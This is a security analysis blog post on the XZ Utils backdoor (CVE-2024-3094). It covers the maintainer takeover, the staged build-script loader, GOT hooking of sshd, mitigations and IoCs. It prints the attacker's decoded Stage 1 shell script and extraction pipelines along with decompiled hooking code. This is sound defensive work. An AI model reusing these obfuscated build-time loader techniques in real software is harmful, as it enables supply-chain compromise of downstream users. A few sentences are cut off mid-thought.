The XZ Backdoor issue triggered by one untrusted maintainer

Executive Summary

  • On March 29, 2024, a supply chain attack targeting XZ Utils, an open source compression utility used in Unix-like and Windows operating systems, was disclosed. It was confirmed that versions 5.6.0 and 5.6.1 contained a backdoor and had been distributed.
    — XZ Utils repository: https[:]//github[.]com/tukaani-project/xz
    — Mirrored developer website: https[:]//git.tukaani[.]org/?p=xz.git
    — Upstream (in open source): the source repository or project where contributions are made and releases are published.
  • User JiaT75, who released the versions containing malicious code, obtained maintainer rights based on the trust gained by contributing to the project.
  • Afterwards, user JiaT75 released a tarball containing a backdoor in the XZ repository.
    — Upstream sshd does not depend on liblzma, but most Linux distributions add a libsystemd dependency to their downstream sshd to support the daemon's systemd-notify function, and libsystemd in turn depends on liblzma.
  • The malicious code hooks the GOT entry of RSA_public_decrypt, verifies the signature of data received through sshd, and, if the signature is valid, executes arbitrary commands.
  • It is conceivable that the JiaT75 account was hijacked and abused for the attack, but it is more likely that inserting this backdoor was the result of a long-term effort
    — In particular, the attacker used a sophisticated, obfuscated mechanism that cleverly interfered with the build process to insert the backdoor. Because such a backdoor cannot be inserted in a short period of time, many analysts believe the attack was likely carried out by a state-sponsored threat group.
  • This attack occurred because important large-scale infrastructure depended on open source projects maintained by a small number of contributors. It is being discussed as a problem in the current open source ecosystem, prompting discussions on countermeasures such as compensating these contributors and securing more reviewers.
    — In the future, special attention must be paid to such supply chain attacks on open source, and active discussion of security inspection measures for open source projects will be needed.

Introduction

On March 29, 2024 (early morning on Saturday the 30th, Korean time), Microsoft engineer Andres Freund reported to oss-security, an open source security mailing list, that a backdoor had been inserted into the XZ repository for malicious purposes.

Subsequent analysis by many researchers confirmed that a user named JiaT75 released a tarball containing backdoor code in the XZ repository on February 24, 2024 (version 5.6.0).

  • Tarball: an archive created with the tar command that bundles files and directories into a single file.
  • XZ: a file compression program based on the LZMA algorithm (used for .tar.xz files and similar).

The news spread quickly: CISA promptly published an alert, and the issue was assigned CVE-2024-3094. Because this vulnerability has a CVSS v3 score of 10.0 and no patch has been released, we strongly recommend that you check and follow the action plans appropriate to your operating environment.

XZ Utils is an open source compression utility used in Unix-like and Windows operating systems and is installed on many servers and PCs around the world. XZ Utils also includes liblzma, a library implementing the LZMA compression algorithm (an algorithm also used in the Linux kernel). However, because the attack was detected relatively quickly given its potential impact, and the backdoored versions had not reached the official stable releases of Linux distributions, no malicious activity related to the XZ backdoor has been disclosed to date. Since the attacker prepared the attack for at least two years, it is highly likely that he avoided using the backdoor hastily in order to keep his work hidden.

To insert this backdoor, the attacker served as a trusted maintainer of XZ Utils for at least two years. Although the JiaT75 account may have been hijacked and abused, it is more likely that a long period of effort went into inserting the backdoor. In particular, cleverly interfering with the build process and inserting a sophisticated, obfuscated backdoor cannot be accomplished in a short period of time. For this reason, the attack is assessed as likely to have been carried out by a state-sponsored threat group.

Andres Freund, the Microsoft engineer who first discovered the backdoor, revealed that he found it while tracking down the cause of abnormal sshd behavior he had noticed.

Timeline

  • 2021-01-26: Account created for user Jia Tan (JiaT75), who later submitted the commit containing the final malware
  • 2022-02-06: JiaT75 submits his first commit to the XZ repository
    — Added parameter validation logic
  • 2022-11-30: Bug report email address changed from Lasse Collin's personal address to the official XZ address (xz@tukaani.org)
    — This address forwards mail to both Lasse Collin and Jia Tan
  • 2023-01-07: JiaT75 merges his first commit
  • 2023-01-11: Lasse Collin publishes 5.4.1, the last version he built and distributed himself
  • 2023-03-18: Jia Tan builds and publishes 5.4.2
  • 2023-06-27: Jia Tan begins submitting suspicious changes
  • 2023-07-08: Pull request to OSS-Fuzz, which performs fuzz testing on open source projects
    — The request contains no malware but disables ifunc
  • 2024-02-15: build-to-host.m4 file name added to .gitignore
  • 2024-02-23: Files containing obfuscated code added under the test path
    — tests/files/bad-3-corrupt_lzma2.xz
    — tests/files/good-large_compressed.lzma
  • 2024-02-24: Version 5.6.0 published with the malicious build-to-host.m4
  • 2024-03-09: Version 5.6.1 published with modified backdoor code
  • 2024-03-29: Analysis published by Microsoft senior developer Andres Freund
  • 2024-03-30: Official statement posted by Lasse Collin, the original maintainer of XZ Utils
    — Removed Jia Tan from the xz@tukaani.org mailing list
    — Removed the xz.tukaani.org DNS name (CNAME)
    — Restored 0 Update notice
  • 2024-04-10: XZ Utils GitHub repository restored

Detailed Analysis

The version with malicious code was distributed through the account (JiaT75) of XZ Utils maintainer Jia Tan. XZ Utils was originally managed solely by one person, Lasse Collin. Lasse Collin has said that managing the project alone took a great deal of time and resources, and in this context he appears to have given Jia Tan authority to co-manage the project.

1. (Possible) Compromise

No specific connection between Jigar Kumar and Jia Tan has been identified, but in mid-April 2022 a person named Jigar Kumar commented on the mailing list, pressing for the patch submitted by Jia Tan to be merged. (Reference: Related email)

Figure 1. Text of Jia Tan’s first patch proposal email (left) / Figures 2, 3. Text of Jigar Kumar’s urging email (center, right)

In May 2022, an email sent to Lasse Collin criticizing his management of the project was identified. In that email, a person named Dennis Ens said he had not yet received an answer to his question and asked whether any feature updates were planned.

In addition, Jigar Kumar, who had earlier pushed for Jia Tan's commit to be merged, again aggressively criticized Lasse Collin. He claimed that the repository would not improve until a new maintainer was appointed and that the current maintainer was no longer interested in it.

Figure 4. Text of Dennis Ens' email asking about xz's Java support (left) / Figure 5. Body of Jigar Kumar's email demanding a new maintainer (right)

In response, Lasse Collin replied that he had not lost interest, but that his ability to care had been limited, mostly due to long-term mental health issues, and he noted that XZ Utils was an unpaid hobby project. Noting the many inquiries he receives by email, he added that he had been working with Jia Tan, who would likely play a bigger role in XZ Utils in the future. This exchange appears to date from June 2022.

Figure 6. Lasse Collin’s explanation of Jigar Kumar’s criticism email (left) / Figure 7. Comment that Jia Tan will soon take on a big role (right)

It is therefore highly likely that this attack relied on social engineering: starting about two years earlier, other accounts were used to build trust in Jia Tan and to pressure the original developer into bringing in a new maintainer. The attacker appears to have deliberately targeted a project maintained by a single person, approaching it with offers of assistance.

2. Exploit the build process

build-to-host.m4 is a legitimate macro file that handles file-name conversion between the build and host systems, and m4* is a macro processing language for processing and generating text.
– *m4 script: collected into aclocal.m4 during the autoconf stage and used to generate the configure script.
The attacker modified part of the build-to-host.m4 script and used it as the first stage for loading the malware.

XZ Utils supports two build methods, CMake and Automake. Because the modified file is an m4 script, the backdoor intervenes in the middle of the Automake build process. The modified m4 script is built and distributed through the process shown below.

The attacker (JiaT75) added build-to-host.m4 to the .gitignore file, so the modified file does not appear in the official Git repository and could not be reviewed there. However, the released tarball contained the modified build-to-host.m4 file, so projects downstream of XZ Utils that used the tarball were affected by the malicious version.

Figure 8. Build process
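Because the modified build-to-host.m4 existed only in the release tarball, one defensive check is to compare a tarball's file list against the files tracked in Git. The Python sketch below is a minimal illustration under our own assumptions: the helper names are hypothetical, the Git file list is assumed to come from `git ls-files` in a checkout of the matching release tag, and tarball entries are assumed to sit under one top-level directory (such as xz-5.6.1/).

```python
import tarfile
from typing import Iterable, Set


def strip_leading(name: str, components: int = 1) -> str:
    """Drop the first `components` path segments, e.g. 'xz-5.6.1/'."""
    return "/".join(name.split("/")[components:])


def tarball_files(path: str, components: int = 1) -> Set[str]:
    """Regular files in a release tarball; tarfile auto-detects gz/bz2/xz."""
    names = set()
    with tarfile.open(path) as tar:
        for member in tar.getmembers():
            if member.isfile():
                stripped = strip_leading(member.name, components)
                if stripped:
                    names.add(stripped)
    return names


def only_in_tarball(tar_files: Iterable[str], git_files: Iterable[str]) -> Set[str]:
    """Files shipped in the tarball but absent from the Git tree."""
    return set(tar_files) - set(git_files)
```

Release tarballs legitimately contain generated files (configure and similar) that are not in Git, so the result is a list of files to review by hand, not a verdict.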

2.1 Initial Stage

The malicious activity begins with the m4/build-to-host.m4 script executed by ./configure. This file normally converts file names between the build system's and the host system's syntax. The malicious code runs when files in the tests directory are built; at that point, $srcdir (described later) points to tests/. The $gl_am_configmake variable in the file's gl_BUILD_TO_HOST_INIT function is set, by the following command, to the path of tests/files/bad-3-corrupt_lzma2.xz, a malicious file disguised as a test file.

Figure 9. Setting variables within gl_BUILD_TO_HOST_INIT

Next, when the gl_BUILD_TO_HOST function is called, it executes the following command using $gl_am_configmake, which was initialized in the INIT function above. $gl_path_map holds the tr command initialized in the INIT function, so the resulting command combines sed and tr.

  • Intermediate execution command: sed "r\n" tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | echo tests/files/bad-3-corrupt_lzma2.xz | sed "s/.*\.//g" -d 2>/dev/null
Figure 10. bad-3-corrupt_lzma2.xz decompression and data conversion

In this pipeline, tr substitutes characters in the input data according to the following rules:

  • Replace 0x09 ('\t') with 0x20 (' ')
  • Replace 0x20 (' ') with 0x09 ('\t')
  • Replace 0x2d ('-') with 0x5f ('_')
  • Replace 0x5f ('_') with 0x2d ('-')

Next, gl_BUILD_TO_HOST extracts the file extension (xz) and stores it in $gl_[$1]_prefix, which is then used to decompress the substituted data with xz. Finally, the bash script is extracted and executed with the following command.

  • Final execution command: sed "r\n" tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d 2>/dev/null
Figure 11. Command execution macro
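To make the final command concrete, the Python sketch below reproduces its effect on a byte string: the tr call swaps tab with space and '-' with '_', and the result is decompressed as an ordinary .xz stream. It is a minimal analysis aid under stated assumptions: the function names are hypothetical, the input is the raw bytes of the test file, and the sed "r\n" step is treated as a plain pass-through (it behaves like cat here, because the file it tries to append does not exist). Nothing is executed.

```python
import lzma

# Same mapping as tr "\t \-_" " \t_\-": tab<->space and '-'<->'_'.
# Every pair is swapped, so applying the table twice restores the input.
SWAP_TABLE = bytes.maketrans(b"\t -_", b" \t_-")


def undo_swap(data: bytes) -> bytes:
    """Apply the byte swap performed by the tr command."""
    return data.translate(SWAP_TABLE)


def decode_initial_stage(raw: bytes) -> bytes:
    """Sketch of `sed "r\\n" FILE | tr ... | xz -d`.

    Assumption: the sed step passes the file through unchanged, so only
    the tr swap and the xz decompression are modelled.
    """
    return lzma.decompress(undo_swap(raw))  # container format is auto-detected
```

Because the swap is its own inverse, disguising a valid .xz file only requires applying the same table once, which is why the test file looks corrupt until the tr step runs.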

2.2 Stage 1

The bash script extracted in 2.1 Initial Stage is shown below (the analysis is based on the 5.6.1 script).

####Hello#### 
# <Random 7-8 bytes of data>
[ ! $( uname ) = "Linux" ] && exit 0
[ ! $( uname ) = "Linux" ] && exit 0
[ ! $( uname ) = "Linux" ] && exit 0
[ ! $( uname ) = "Linux" ] && exit 0
[ ! $( uname ) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`   # read srcdir (the xz source path) from config.status
if test -f ../../config.status; then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";
(xz -dc $srcdir/tests/files/good-large_compressed.lzma |
eval $i |
tail -c +31233 |
tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377") |
xz -F raw --lzma1 -dc |
/bin/sh
####World####

[Execution order]
1) Decompress the tests/files/good-large_compressed.lzma file with xz
2) Pass the decompressed data to $i, the command chain defined above
3) $i repeatedly discards 1,024 bytes and then outputs the next 2,048 bytes
— In the 5.6.1 script above, this pair repeats 16 times, followed by a final 1,024-byte skip and one shorter chunk
4) The final chunk is 724 bytes in version 5.6.0 and 939 bytes in version 5.6.1
5) tail then discards the leading part of the merged output, keeping only the data used in Stage 2
— The offset is 31,264 bytes in 5.6.0 and 31,233 bytes in 5.6.1
6) tr substitutes bytes, as in the initial stage
— The substitution sets for versions 5.6.0 and 5.6.1 differ as follows:

  • 5.6.0 : tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377"
  • 5.6.1 : tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"

7) Decompress the substituted data with xz as a raw LZMA1 stream (-F raw --lzma1) and pipe the resulting Stage 2 bash script to /bin/sh.
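The byte-selection steps above can be replayed in Python for analysis. This is a minimal sketch with hypothetical helper names, using the 5.6.1 parameters from the script (16 rounds, a final 939-byte chunk, tail -c +31233, and the 5.6.1 tr ranges); it deliberately stops before the raw LZMA1 decompression and never runs anything.

```python
def select_chunks(data: bytes, rounds: int = 16, skip: int = 1024,
                  keep: int = 2048, last_keep: int = 939) -> bytes:
    """Mimic $i: drop `skip` bytes, keep `keep` bytes, repeat; then a shorter last chunk."""
    out = bytearray()
    pos = 0
    for _ in range(rounds):
        pos += skip                      # (head -c +1024 >/dev/null)
        out += data[pos:pos + keep]      # head -c +2048
        pos += keep
    pos += skip                          # final (head -c +1024 >/dev/null)
    out += data[pos:pos + last_keep]     # head -c +939 in 5.6.1
    return bytes(out)


def tail_from(data: bytes, n: int) -> bytes:
    """`tail -c +n` outputs everything starting at the n-th byte (1-based)."""
    return data[n - 1:]


def tr_table(octal_ranges) -> bytes:
    """Table equivalent to `tr "<ranges>" "\\0-\\377"`: the i-th listed byte maps to i."""
    src = []
    for lo, hi in octal_ranges:
        src.extend(range(int(lo, 8), int(hi, 8) + 1))
    if sorted(src) != list(range(256)):
        raise ValueError("ranges must list every byte value exactly once")
    table = bytearray(256)
    for dst, byte in enumerate(src):
        table[byte] = dst
    return bytes(table)


# Ranges of the 5.6.1 command: "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"
TR_561 = tr_table([("114", "321"), ("322", "377"), ("35", "47"),
                   ("14", "34"), ("0", "13"), ("50", "113")])


def stage1_transform(decompressed: bytes) -> bytes:
    """eval $i | tail -c +31233 | tr ..., applied to the xz-decompressed test file."""
    return tail_from(select_chunks(decompressed), 31233).translate(TR_561)
```

Since the six ranges cover all 256 byte values exactly once, the tr step is a byte permutation: it scrambles the data without losing information, which is why a single table lookup undoes it.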

2.3 Stage 2

The Stage 2 script inspects the build environment and decrypts the remaining data that was not used in Stage 1.

[Execution order]
1) Check the execution environment of the Stage 2 script
— Check whether the user is deviating from the normal build, for example by running the intermediate configure stage manually
— Check whether it is a Debian or RPM build for the x86_64 architecture
2) If these checks pass, merge the data using the $i function, as in Stage 1.
3) Decrypt the data with an AWK script, using numbers generated by an RC4-style PRNG*.
*However, this algorithm differs from standard RC4 in the following ways:

  1. The array S is initialized without an encryption key, as follows:
     for i in 0..255: S[i] = ((7 * i) + 5) % 256

  2. The first 4,096 PRNG outputs are discarded in 5.6.0, and the first 8,192 in 5.6.1.

  3. The keystream is combined with the encrypted data by addition, not by XOR.

4) The decrypted data is then decompressed with xz, and the resulting object file is inserted into the liblzma build.
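The modified RC4 described in steps 1 to 3 can be sketched as follows. This is our own minimal Python reconstruction from the description above, not the attacker's AWK code; `keystream` and `decrypt` are hypothetical names, and the discard count from step 2 is passed in as a parameter.

```python
from typing import Iterator


def keystream(discard: int) -> Iterator[int]:
    """RC4-style PRGA with the key-less initial state S[i] = (7*i + 5) % 256."""
    m = 256
    s = [((7 * i) + 5) % m for i in range(m)]  # no key-scheduling step at all
    i = j = 0

    def step() -> int:
        nonlocal i, j
        i = (i + 1) % m
        j = (j + s[i]) % m
        s[i], s[j] = s[j], s[i]
        return s[(s[i] + s[j]) % m]

    for _ in range(discard):  # step 2: throw away the first `discard` outputs
        step()
    while True:
        yield step()


def decrypt(data: bytes, discard: int) -> bytes:
    """Step 3: plaintext byte = (ciphertext byte + keystream byte) mod 256, not XOR."""
    return bytes((c + k) % 256 for c, k in zip(data, keystream(discard)))
```

Because 7 and 256 are coprime, the initial formula already yields a permutation of 0..255, so the state is valid RC4 state even without a key. Since decryption adds the keystream, the matching encryption subtracts it modulo 256, which gives an easy round-trip check.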

2.4 IFUNC Enable

In general, the addresses of library functions in the Global Offset Table (GOT) can be resolved at any point while a program runs (lazy binding). For security reasons, however, hardened binaries now resolve these addresses during dynamic linking at load time and then make the GOT read-only, so the entries cannot be modified while the program is running. The attacker exploited the window before the GOT becomes read-only: GNU indirect function (ifunc) resolvers, which select a function implementation at load time so that calls do not need to go through function pointers, run inside that window.

The attacker inserted code that modifies the GOT entry of the RSA_public_decrypt function into __get_cpuid, which is called from the ifunc resolver in the object file, so that the entry is redirected to the malicious code while the ifunc resolver runs.
As a result, when sshd actually runs, it executes the attacker's code instead of the normal RSA_public_decrypt function.

if ( symbol_to_resolve_id == RSA_public_decrypt && v11 )    // RSA_public_decrypt: the initial hooking target
{
    if ...
    goto LABEL_27;
}
v13 = v7[4];
if ( v13 && symbol_to_resolve_id == EVP_PKEY_set1_RSA )      // If the RSA_public_decrypt symbol does not exist,
{                                                             // attempt to hook EVP_PKEY_set1_RSA
    if ...
    v7[1] = *v13;
    v14 = *(filter_options + 0x118);
    *v13 = v14;
    if ...
    v15 = v7[5];
    if ...
    v16 = *v15 <= 0xFFFFFFuLL;
}
else                                                          // If neither symbol above exists
{
    v17 = v7[5];
    if ( symbol_to_resolve_id != RSA_get0_key || !v17 )       // Finally, try hooking RSA_get0_key
        return *(a1 + 8);
    if ...
    v7[2] = *v17;
    v18 = *(filter_options + 0x120);
    *v17 = v18;
    if ...
    if ...
    v16 = *v13 <= 0xFFFFFFuLL;
}

The attacker also appears to have anticipated that the hooking target, RSA_public_decrypt, might be removed in a future OpenSSH update: if that function's symbol is not found, the code sequentially attempts to modify the GOT entries of EVP_PKEY_set1_RSA and then RSA_get0_key.

2.5 Landlock Disable

The attacker modified CMakeLists.txt by inserting a stray dot (.) into the test code that checks for Landlock, a sandboxing feature supported in Linux, so that the check always fails to compile. As a result, Landlock is never enabled in CMake builds. However, because this change is not needed to backdoor SSH, no attack that relies on Landlock being disabled has been identified so far.

Figure 12. CMakeLists.txt modified to disable Landlock.

3. Malicious behavior

Because the malware is distributed as part of a library, it is loaded into any process whose executable depends on liblzma.

In the case of sshd, the malware's target, upstream sshd has no liblzma dependency, but most Linux distributions add a libsystemd dependency to their downstream sshd to support the daemon's systemd-notify function.

libsystemd depends on liblzma, so the malicious liblzma ends up loaded into the sshd process. The malware was also observed to activate when the process name was /usr/sbin/sshd.

Figure 13. Command delivery process from attacker

As explained in 2.4 IFUNC Enable, the malware hooks the GOT entry of RSA_public_decrypt and verifies the signature of data received through sshd. If the signature was created by the attacker, the malware executes arbitrary commands.

An Ed448 public key is hard-coded into the malware, and the malware attempts to decrypt incoming data using the first 32 bytes of that public key as the ChaCha20 decryption key.
If decryption succeeds, the data contains a command to execute and a signature over it. If the signature verifies against the hard-coded Ed448 public key (meaning it was created with the attacker's corresponding private key), the command contained in the message is executed through the system() function.

Note that this process leaves no other information or logs that could reveal it, and if the payload and signature are not what the attacker intended, the normal RSA_public_decrypt function is called as usual, making network-level detection of the attack impossible.

More details

1. First detection

Microsoft's Andres Freund, who first discovered the backdoor and disclosed it to the community, began investigating after noticing unusually high CPU usage by liblzma and valgrind errors during sshd logins. He notes that the backdoor caused valgrind errors and crashes in some configurations because the stack layout differed from what it expected, an issue he says was addressed in 5.6.1. He then discovered the backdoor while debugging and reported it to the Openwall Project's oss-security mailing list. He added that with the backdoor installed, SSH logins become noticeably slower (by about 500 ms).

  • Valgrind: A programming tool used to inspect and debug memory management issues.
Figure 14. SSH login processing speed before and after installing XZ Backdoor

2. Initial detection

Around July 2023, JiaT75 also submitted a change without malicious code to OSS-Fuzz, a project that automatically discovers and reports vulnerabilities in open source software. In that change, the ifunc functionality that would later be exploited was disabled for fuzzing in advance.

Figure 15. Addition of ifunc function in JiaT75 (left) / Figure 16. Addition of ifunc disable option (right)

3. Other repositories affected by the actor

Since user JiaT75 has been active since at least 2021, he may have been involved in projects other than XZ. In fact, in November 2021 he submitted a patch to the libarchive repository that replaced safe_fprintf calls with the unsafe fprintf function. The change was merged into the main branch, and one researcher has written and disclosed PoC code that triggers the resulting vulnerability.

Impact

XZ Utils is a library widely used in many Linux distributions. Affected systems are those whose distributions both package an upstream tarball built with the malicious build-to-host.m4 macro file and add a libsystemd dependency that causes liblzma to be loaded into sshd.

  • Fedora 40 beta, 41, Rawhide: 5.6.0 (2024-02-27), 5.6.1 (2024-03-09)
  • openSUSE Tumbleweed: 5.6.0 (2024-03-05), 5.6.1 (2024-03-17)
  • Alpine Edge: 5.6.1 (2024-03-11)
  • Arch Linux: 5.6.0 (2024-02-24), 5.6.1 (2024-03-10)
  • Debian Unstable: 5.6.0 (2024-02-25), 5.6.1 (2024-03-27)
  • Kali: 5.6.0 (2024-03-26)

Distributions that build from the GitHub repository source rather than the upstream release tarball, such as OpenWrt, do not receive the modified build-to-host.m4, because the file is excluded by .gitignore. They are therefore not affected by the backdoor even if they use version 5.6.0 or 5.6.1. However, the dormant malicious files remain in the local repository used for the build, so a response such as deleting that repository is still necessary.

This backdoor can execute arbitrary code in the sshd context, so an attacker who presents a specific signature can obtain root-level access over SSH without any further conditions. In other words, an attacker can bypass SSH authentication and execute remote code with root privileges on any system where a vulnerable XZ Utils is installed and loaded by sshd, so the mitigations described below must be applied.

Mitigation

If you are using XZ Utils 5.6.0 or 5.6.1, we strongly recommend downgrading to version 5.4.x or earlier. If the system runs the sshd service, restart it after downgrading, and monitor for suspicious SSH access logs and unauthorized account creation. The attacker used tricks such as flags that disable verbose logging, or replacing log entries with normal-looking ones, so that abnormal logs cannot be distinguished. However, because the connection itself is still recorded normally in the sshd logs, monitoring users' access patterns or connection times may make it possible to detect an attacker's connection.
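As a quick first check for the versions named above, the following Python sketch parses the output of `xz --version`, which prints an `xz (XZ Utils) X.Y.Z` line followed by a `liblzma X.Y.Z` line. It is an assumption-laden helper, not a complete detector: the function names are hypothetical, and the versions reported by the xz binary may not match the liblzma actually loaded by sshd, so the distribution's package manager remains the authoritative source.

```python
import re
import shutil
import subprocess
from typing import Dict, Optional

BACKDOORED_VERSIONS = frozenset({"5.6.0", "5.6.1"})

_PATTERNS = {
    "xz": re.compile(r"^xz \(XZ Utils\) (\S+)", re.MULTILINE),
    "liblzma": re.compile(r"^liblzma (\S+)", re.MULTILINE),
}


def parse_versions(version_output: str) -> Dict[str, str]:
    """Extract the xz and liblzma versions from `xz --version` output."""
    found = {}
    for name, pattern in _PATTERNS.items():
        match = pattern.search(version_output)
        if match:
            found[name] = match.group(1)
    return found


def looks_backdoored(versions: Dict[str, str]) -> bool:
    """True if either reported version is one of the backdoored releases."""
    return any(v in BACKDOORED_VERSIONS for v in versions.values())


def local_xz_versions() -> Optional[Dict[str, str]]:
    """Run the local xz binary, if present, and parse its version output."""
    xz = shutil.which("xz")
    if xz is None:
        return None
    result = subprocess.run([xz, "--version"], capture_output=True, text=True, check=False)
    return parse_versions(result.stdout)
```

A caller would typically do `versions = local_xz_versions()` and, if `versions` is not None and `looks_backdoored(versions)` is true, follow the downgrade steps above.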

In addition, Lasse Collin, maintainer of

Figure 17. Analysis of the kill switch (Link)

If you cannot downgrade (or later update to version 5.8.0), as a temporary measure you can disable the backdoor by activating its kill switch: add the string below to the /etc/environment file and restart the sshd service.

  • yolAbejyiejuvnup=Evjtgvsh5okmkAvj

Stopping the sshd service is another temporary measure, but in that case its impact on the system must also be reviewed.

Detection

The following are publicly available tools and detection methods for detecting CVE-2024-3094.

Conclusion

  • Given how long and meticulous the preparation was, the attack is unlikely to be the work of a typical cybercriminal or an impulsive actor.
  • In addition, considering that the payload delivery process is very complex and the potential impact is global, a state-backed attack group is suspected to be behind it
    — specifically, a group with a history of supply chain attacks and global targeting. China, Russia, and North Korea have all been mentioned as possible culprits, but no clear evidence has been found yet.
  • This incident occurred because important large-scale infrastructure depended on projects maintained by a small number of open source contributors. It is being discussed as a problem in the current open source ecosystem, sparking discussions on measures such as compensating these contributors and securing more reviewers.
  • According to the author of the Boehs blog, Jia Tan's connection information on the tukaani IRC channel showed an IP address, suspected to be a VPN, located in Vietnam.
  • In the future, special attention must be paid to such supply chain attacks on open source, and active discussion of security inspection measures for open source projects is expected to be needed.

Reference

Appendix

Appendix A. IoCs

Email

  • jiat0218[@]gmail.com

File hash

  • 81e0fd62752bdab11fa992af9d9545af
  • 307958b78b392e58a2c88e620a121708
  • 213fb2a8131bc108d636f1b03109c37e
  • ac3b4d9f163c90143f938627473a804a
  • 41c96174e4ef3870eb7ec9d5f875a6dc
  • 9ba1a547a18a310fac9c8a419b5794fc
  • 3a4e77b515b4a712a26ebf7274de61fe
  • c04b42084816862fc1d9e4f024a28a39
  • 4f0cf1d2a2d44b75079b3ea5ed28fe54
  • 53d82bb511b71a5d4794cf2d8a2072c1
  • d302c6cb2fa1c03c710fa5285651530f
  • 212ffa0b24bb7d749532425a46764433
  • d26cefd934b33b174a795760fc79e6b5
  • 4ec47410372386d02c432ba10e5d7fda
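To check local files against the hashes listed above, a small script can hash each file and compare the result. This sketch assumes the 32-hex-digit values are MD5 digests (their length suggests so, but the list does not say); the function names are hypothetical, and while a match identifies a known sample, a non-match proves nothing about a file.

```python
import hashlib
from typing import Iterable, List

# Values copied from the "File hash" list above (assumed to be MD5).
IOC_MD5 = frozenset({
    "81e0fd62752bdab11fa992af9d9545af",
    "307958b78b392e58a2c88e620a121708",
    "213fb2a8131bc108d636f1b03109c37e",
    "ac3b4d9f163c90143f938627473a804a",
    "41c96174e4ef3870eb7ec9d5f875a6dc",
    "9ba1a547a18a310fac9c8a419b5794fc",
    "3a4e77b515b4a712a26ebf7274de61fe",
    "c04b42084816862fc1d9e4f024a28a39",
    "4f0cf1d2a2d44b75079b3ea5ed28fe54",
    "53d82bb511b71a5d4794cf2d8a2072c1",
    "d302c6cb2fa1c03c710fa5285651530f",
    "212ffa0b24bb7d749532425a46764433",
    "d26cefd934b33b174a795760fc79e6b5",
    "4ec47410372386d02c432ba10e5d7fda",
})


def md5_of_chunks(chunks: Iterable[bytes]) -> str:
    """Hex MD5 digest of the concatenation of `chunks`."""
    h = hashlib.md5()
    for chunk in chunks:
        h.update(chunk)
    return h.hexdigest()


def md5_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in fixed-size chunks so large files are not read into memory."""
    with open(path, "rb") as f:
        return md5_of_chunks(iter(lambda: f.read(chunk_size), b""))


def matching_files(paths: Iterable[str], iocs: frozenset = IOC_MD5) -> List[str]:
    """Return the paths whose MD5 digest appears in `iocs`."""
    return [p for p in paths if md5_of_file(p) in iocs]
```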

Network

  • There is no Network IoC discovered to date.

Appendix B. Infographic (Authored by Thomas Roccia)

Appendix C. ATT&CK MATRIX

Reconnaissance

  • (T1593.003) Code Repositories

Resource Development

  • (T1585.002) Email Accounts
  • (T1650) Acquire Access

Initial Access

  • (T1195.001) Compromise Software Dependencies and Development Tools

Execution

  • (T1059.004) Unix Shell

Defense Evasion

  • (T1140) Deobfuscate/Decode Files or Information

Command and Control

  • (T1573.001) Symmetric Cryptography

https://medium.com/s2wblog/the-xz-backdoor-issue-triggered-by-one-untrusted-maintainer-2d5e5c1273d0